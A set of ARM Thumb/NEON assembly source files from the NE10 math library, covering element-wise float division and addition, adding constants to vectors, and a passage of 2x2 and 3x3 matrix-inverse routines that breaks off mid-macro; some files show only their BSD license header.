@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_dot.asm.s
@
|
open-vela/external_Ne10 | 3,210 | modules/math/NE10_div.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_div.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_div_float_asm
.thumb
.thumb_func
ne10_div_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ Element-wise division of two float arrays:
@   dst[i] = src1[i] / src2[i], for i in [0, count)
@
@ arm_result_t ne10_div_float(arm_vec2f_t * dst,
@ arm_float_t * src1, const arm_float_t * src2,
@ unsigned int count)
@
@ r0: *dst  - advanced in place past each stored result
@ r1: *src1 - advanced in place past each loaded entry
@ r2: *src2 - advanced in place past each loaded entry
@ r3: int count, reused as the loop counter (counts down to 0)
@
@ Leaf routine using only caller-saved registers, so nothing is
@ pushed or popped.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
cbz r3, .LoopEndFloat @ nothing to do when count == 0
.LoopBeginFloat:
vldr s1, [r1] @ s1 = src1[i]
add r1, r1, #4 @ src1++
vldr s2, [r2] @ s2 = src2[i]
add r2, r2, #4 @ src2++
vdiv.f32 s10, s1, s2 @ s10 = src1[i] / src2[i]
vstr s10, [r0] @ dst[i] = s10
add r0, r0, #4 @ dst++
subs r3, r3, #1 @ i--
bne .LoopBeginFloat @ loop while items remain (r3 != 0)
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
bx lr
|
open-vela/external_Ne10 | 1,608 | modules/math/NE10_mulmat.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_mulmat.asm.s
@
|
open-vela/external_Ne10 | 1,613 | modules/math/NE10_identitymat.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_identitymat.asm.s
@
|
open-vela/external_Ne10 | 3,210 | modules/math/NE10_add.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_add.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_add_float_asm
.thumb
.thumb_func
ne10_add_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ Element-wise addition of two float arrays:
@   dst[i] = src1[i] + src2[i], for i in [0, count)
@
@ arm_result_t ne10_add_float(arm_vec2f_t * dst,
@ arm_float_t * src1, const arm_float_t * src2,
@ unsigned int count)
@
@ r0: *dst  - advanced in place past each stored result
@ r1: *src1 - advanced in place past each loaded entry
@ r2: *src2 - advanced in place past each loaded entry
@ r3: int count, reused as the loop counter (counts down to 0)
@
@ Leaf routine using only caller-saved registers, so nothing is
@ pushed or popped.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
cbz r3, .LoopEndFloat @ nothing to do when count == 0
.LoopBeginFloat:
vldr s1, [r1] @ s1 = src1[i]
add r1, r1, #4 @ src1++
vldr s2, [r2] @ s2 = src2[i]
add r2, r2, #4 @ src2++
vadd.f32 s10, s1, s2 @ s10 = src1[i] + src2[i] (comment fixed: was "*")
vstr s10, [r0] @ dst[i] = s10
add r0, r0, #4 @ dst++
subs r3, r3, #1 @ i--
bne .LoopBeginFloat @ loop while items remain (r3 != 0)
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
bx lr
|
open-vela/external_Ne10 | 9,792 | modules/math/NE10_addc.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_addc.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_addc_float_asm
.thumb
.thumb_func
ne10_addc_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ Add the scalar constant cst to every float in src[]:
@   dst[i] = src[i] + cst, for i in [0, count)
@
@ NOTE(review): the first parameter below is presumably
@ "arm_float_t * dst" - "arm_vec2f_t *" looks like a copy/paste
@ leftover from the vec2 variant; confirm against the public header.
@
@ arm_result_t ne10_addc_float(arm_vec2f_t * dst,
@ arm_float_t * src, const arm_float_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: cst - the scalar constant itself, passed by VALUE (see the
@     "vmov s3, r2" below; r2 is never dereferenced)
@ r3: int count, reused as the loop counter (counts down to 0)
@
@ r5: current item's byte offset into both src[] and dst[]
@ r6: current source item's address, base(r1) + offset(r5)
@ r7: current destination item's address, base(r0) + offset(r5)
@
@ r4 is saved/restored although unused - presumably to keep the stack
@ 8-byte aligned per the AAPCS (TODO confirm).
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndFloat @ nothing to do when count == 0
mov r5, #0 @ offset = 0
.LoopBeginFloat:
add r6, r1, r5 @ r6 = &src[i]
vldr s1, [r6, #0] @ s1 = src[i]
vmov s3, r2 @ s3 = cst (reinterpret the bits held in r2 as a float)
vadd.f32 s10, s1, s3 @ s10 = src[i] + cst
add r7, r0, r5 @ r7 = &dst[i]
vstr s10, [r7, #0] @ dst[i] = s10
add r5, r5, #4 @ advance the offset by 1*sizeof(float)
subs r3, r3, #1 @ i--
bne .LoopBeginFloat @ loop while items remain (r3 != 0)
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_addc_vec2f_asm
.thumb
.thumb_func
ne10_addc_vec2f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ Component-wise addition of one constant 2D vector:
@   dst[i].x = src[i].x + cst->x;  dst[i].y = src[i].y + cst->y
@
@ arm_result_t ne10_addc_vec2f(arm_vec2f_t * dst,
@ arm_vec2f_t * src, const arm_vec2f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst - pointer; x/y are reloaded from it on every iteration
@ r3: int count, reused as the loop counter (counts down to 0)
@
@ r5: current item's byte offset into both src[] and dst[]
@ r6: current source item's address, base(r1) + offset(r5)
@ r7: current destination item's address, base(r0) + offset(r5)
@
@ r4 is saved/restored although unused - presumably to keep the stack
@ 8-byte aligned per the AAPCS (TODO confirm).
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec2F @ nothing to do when count == 0
mov r5, #0 @ offset = 0
.LoopBeginVec2F:
add r6, r1, r5 @ r6 = &src[i]
vldr s1, [r6, #0] @ s1 = src[i].x
vldr s2, [r6, #4] @ s2 = src[i].y
vldr s3, [r2, #0] @ s3 = cst->x
vldr s4, [r2, #4] @ s4 = cst->y
vadd.f32 s10, s1, s3 @ s10 = src[i].x + cst->x
vadd.f32 s11, s2, s4 @ s11 = src[i].y + cst->y
add r7, r0, r5 @ r7 = &dst[i]
vstr s10, [r7, #0] @ dst[i].x = s10
vstr s11, [r7, #4] @ dst[i].y = s11
add r5, r5, #8 @ advance the offset by 2*sizeof(float)
subs r3, r3, #1 @ i--
bne .LoopBeginVec2F @ loop while items remain (r3 != 0)
.LoopEndVec2F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_addc_vec3f_asm
.thumb
.thumb_func
ne10_addc_vec3f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_addc_vec3f(arm_vec3f_t * dst,
@                 arm_vec3f_t * src, const arm_vec3f_t * cst,
@                 unsigned int count)
@
@ Adds the constant 3-float vector *cst to each element of src[] and
@ writes the sums to dst[].  Returns NE10_OK.
@
@  r0: *dst
@  r1: *src
@  r2: *cst
@  r3: int count
@
@  r3: loop counter
@  r5: current item's offset in both src[] and dst[]
@  r6: current source item's address made of base(r1)+offset(r5)
@  r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec3F
vldr s4, [r2, #0] @ cst is loop-invariant: load cst->x, cst->y and cst->z once
vldr s5, [r2, #4]
vldr s6, [r2, #8]
mov r5, #0
.LoopBeginVec3F:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i].x, src[i].y, and src[i].z
vldr s2, [r6, #4]
vldr s3, [r6, #8]
vadd.f32 s10, s1, s4 @ s10 = src[i].x + cst->x
vadd.f32 s11, s2, s5 @ s11 = src[i].y + cst->y
vadd.f32 s12, s3, s6 @ s12 = src[i].z + cst->z
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the results back into the main memory
vstr s11, [r7, #4]
vstr s12, [r7, #8]
add r5, r5, #12 @ increase the offset by 3*sizeof(float) (for x, y, and z)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginVec3F @ Continue if "i < count"
.LoopEndVec3F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_addc_vec4f_asm
.thumb
.thumb_func
ne10_addc_vec4f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_addc_vec4f(arm_vec4f_t * dst,
@                 arm_vec4f_t * src, const arm_vec4f_t * cst,
@                 unsigned int count)
@
@ Adds the constant 4-float vector *cst to each element of src[] and
@ writes the sums to dst[].  Returns NE10_OK.
@
@  r0: *dst
@  r1: *src
@  r2: *cst
@  r3: int count
@
@  r3: loop counter
@  r5: current item's offset in both src[] and dst[]
@  r6: current source item's address made of base(r1)+offset(r5)
@  r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec4F
vldr s5, [r2, #0] @ cst is loop-invariant: load cst->x, y, z and w once
vldr s6, [r2, #4]
vldr s7, [r2, #8]
vldr s8, [r2, #12]
mov r5, #0
.LoopBeginVec4F:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i].x, src[i].y, src[i].z, and w
vldr s2, [r6, #4]
vldr s3, [r6, #8]
vldr s4, [r6, #12]
vadd.f32 s10, s1, s5 @ s10 = src[i].x + cst->x
vadd.f32 s11, s2, s6 @ s11 = src[i].y + cst->y
vadd.f32 s12, s3, s7 @ s12 = src[i].z + cst->z
vadd.f32 s13, s4, s8 @ s13 = src[i].w + cst->w
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the results back into the main memory
vstr s11, [r7, #4]
vstr s12, [r7, #8]
vstr s13, [r7, #12]
add r5, r5, #16 @ increase the offset by 4*sizeof(float) (for x, y, z, and w)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginVec4F @ Continue if "i < count"
.LoopEndVec4F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
|
open-vela/external_Ne10 | 22,395 | modules/math/NE10_invmat.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_invmat.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.include "NE10_detmat.neon.inc.s"
@ Constant pools shared by the inverse routines below; their addresses are
@ taken PC-relative with "adr" and loaded as a whole q register (4 lanes).
CONST_FLOAT_ONE:
.word 0x3f800000 @ This is the hex value for 1.0f in IEEE-754,
.word 0x3f800000 @ replicated into all four 32-bit lanes
.word 0x3f800000
.word 0x3f800000
CONST_FLOAT_1Em12:
.word 0x2B8CBCCC @ This is the hex representation of 1.0e-12 in IEEE-754
.word 0x2B8CBCCC @ Any determinant smaller than this value is
.word 0x2B8CBCCC @ considered near zero and refused for
.word 0x2B8CBCCC @ calculating the inverse of a matrix.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro calculates the inverse of four 2x2 matrices at once.
@ Input:   q8-q11 hold the four matrices lane-transposed, as produced
@          by the caller's vld4.32: q8={a1..a4}, q9={b1..b4},
@          q10={c1..c4}, q11={d1..d4} for Mi = [ai bi; ci di].
@ Expects: q0 = near-zero threshold (1e-12) and q1 = 1.0f in all lanes
@          (loaded by the caller from the constant pools above).
@ Output:  q12-q15 = the four inverses, same lane-transposed layout.
@ Note:    a matrix whose |det| < threshold has its determinant
@          replaced by 1.0f before the reciprocal is taken.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro GET_INVERSE_2x2MATS
@ det(Mi) = ai*di - bi*ci, one determinant per lane of q15
vmul.f32 q15, q8, q11
vmls.f32 q15, q9, q10
@ compare them to find the ones that are too small and set those to 1.0f
vacge.f32 q14, q15, q0 @ q14 lane = all-ones iff |det| >= |threshold|
vand.f32 q13, q14, q15 @ tmp = q13: the determinants that are large enough
vbic.s32 q14, q1, q14 @ NOTE: This must be of type S32, the type F32 only negates the sign bits
vorr.f32 q14, q14, q13 @ at this point q14 lanes that are too small are set to one and the rest are the determinants
@ q15 = 1.0f / q14, via vrecpe plus one Newton-Raphson refinement step
vrecpe.f32 q15, q14
vrecps.f32 q14, q15, q14
vmul.f32 q14, q14, q15
@ inv(M) = (1/det) * [d -b; -c a]; q14 = { 1/det(M1-M4) }
vmul.f32 q12, q11, q14 @ a' =  d/det
vmul.f32 q15, q8, q14 @ d' =  a/det
vneg.f32 q14, q14
vmul.f32 q13, q9, q14 @ b' = -b/det
vmul.f32 q14, q10, q14 @ c' = -c/det
.endm
.align 4
.global ne10_invmat_2x2f_neon
.thumb
.thumb_func
ne10_invmat_2x2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_invmat_2x2f(arm_mat2x2f_t * dst,
@                 arm_mat2x2f_t * src,
@                 unsigned int count)
@
@ Inverts count 2x2 float matrices from src[] into dst[], four at a
@ time; returns 0.  Uses only caller-saved NEON registers (q0-q3 and
@ q8-q15), so nothing needs to be vpush'ed.
@
@  r0: *dst & current dst entry's address
@  r1: *src & current src entry's address
@  r2: int count & the number of items in the input array that can be
@                   processed in chunks of 4 vectors
@
@  r3: the number of items that are left to be processed at the end of
@      the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
adr r4, CONST_FLOAT_1Em12
vld1.32 {q0}, [r4] @ q0 = near-zero threshold, for GET_INVERSE_2x2MATS
adr r4, CONST_FLOAT_ONE
vld1.32 {q1}, [r4] @ q1 = 1.0f in all lanes
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r3; This is what's left to be processed after this loop
cmp r2, #0
beq .L_check_mat2x2
@ We load four 2x2 matrices each time, inverse them using the
@ provided macro above, and store the four resulting matrices
@ back into the memory location pointed to by the first parameter dst (r0)
@ load the 1st set of values; vld4 de-interleaves so each of q8-q11
@ holds the same entry (a, b, c, d) of four consecutive matrices
vld4.32 {d16, d18, d20, d22}, [r1]!
vld4.32 {d17, d19, d21, d23}, [r1]!
subs r2, r2, #4 @ 4 for this set
@ calculate values for the 1st set
GET_INVERSE_2x2MATS
ble .L_mainloopend_mat2x2
.L_mainloop_mat2x2:
@ store the result for the current set
vst4.32 {d24, d26, d28, d30}, [r0]!
vst4.32 {d25, d27, d29, d31}, [r0]!
@ load the next set of values
vld4.32 {d16, d18, d20, d22}, [r1]!
vld4.32 {d17, d19, d21, d23}, [r1]!
subs r2, r2, #4
@ calculate values for the next set
GET_INVERSE_2x2MATS
bgt .L_mainloop_mat2x2 @ loop if r2 > 0, if we have at least another 4 matrices to process
.L_mainloopend_mat2x2:
@ the last iteration for this call
@ store the result for the last set
vst4.32 {d24, d26, d28, d30}, [r0]!
vst4.32 {d25, d27, d29, d31}, [r0]!
.L_check_mat2x2:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_mat2x2
.L_secondloop_mat2x2:
@ process the last few items one matrix at a time; only lane 0 of each
@ register is loaded and stored, the other lanes hold don't-care data
vld4.32 {d16[0], d18[0], d20[0], d22[0]}, [r1]!
subs r3, r3, #1
@ calculate values
GET_INVERSE_2x2MATS
@ store the results
vst4.32 {d24[0], d26[0], d28[0], d30[0]}, [r0]!
bgt .L_secondloop_mat2x2
.L_return_mat2x2:
@ return 0
pop {r4}
mov r0, #0
bx lr
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro calculates the inverse of two 3x3 matrices.
@ It reads in the matrices from registers q0-q5 (lane-transposed, in
@ the layout produced by LOAD_3x3MATS_ARGS) and returns its results
@ in registers q10-q15.
@ Expects: d12 (q6 low) = near-zero threshold, d14 (q7 low) = 1.0f,
@          both set up by the caller.  Clobbers q8/q9 as scratch.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro GET_INVERSE_3x3MATS
@ get the determinants of the two matrices in d16 (one per lane)
GET_DETERMINANT_of_3x3MATS_ARGS d0, d2, d4, d6, d8, d10, d1, d3, d5, d16, d9, d11 @ stores the results in d16
@ compare them to find the ones that are too small and set those to 1.0f
vacge.f32 d9, d16, d12 @ dst = d9 - the lanes that are too small are set to all (0)b
vand.f32 d11, d9, d16 @ tmp = d11
vbic.s32 d9, d14, d9 @ NOTE: This must be of type S32, the type F32 only negates the sign bits
vorr.f32 d9, d9, d11 @ at this point d9 lanes that are too small are set to one and the rest are the determinants
@ d16 = 1.0f / d9, via vrecpe plus one Newton-Raphson refinement step
vrecpe.f32 d16, d9
vrecps.f32 d9, d16, d9
vmul.f32 d16, d9, d16
vmov.f32 d17, d16 @ So q8 = { d16={1/det(M1), 1/det(M2)}, d17={1/det(M1), 1/det(M2)} }
@ get the cofactors (signed 2x2 minors) in q10 to q15
GET_DET_2x2MATS_ARGS d8, d10, d3, d5, d20
GET_NEG_DET_2x2MATS_ARGS d6, d10, d1, d5, d26
GET_DET_2x2MATS_ARGS d6, d8, d1, d3, d21
GET_NEG_DET_2x2MATS_ARGS d2, d4, d3, d5, d22
GET_DET_2x2MATS_ARGS d0, d4, d1, d5, d28
GET_NEG_DET_2x2MATS_ARGS d0, d2, d1, d3, d23
GET_DET_2x2MATS_ARGS d2, d4, d8, d10, d24
GET_NEG_DET_2x2MATS_ARGS d0, d4, d6, d10, d30
GET_DET_2x2MATS_ARGS d0, d2, d6, d8, d25
@ now multiply all the entries with q8 = { d16={1/det(M1), 1/det(M2)}, d17={1/det(M1), 1/det(M2)} }
vmul.f32 q10, q10, q8
vmul.f32 q11, q11, q8
vmul.f32 q12, q12, q8
vmul.f32 q13, q13, q8
vmul.f32 q14, q14, q8
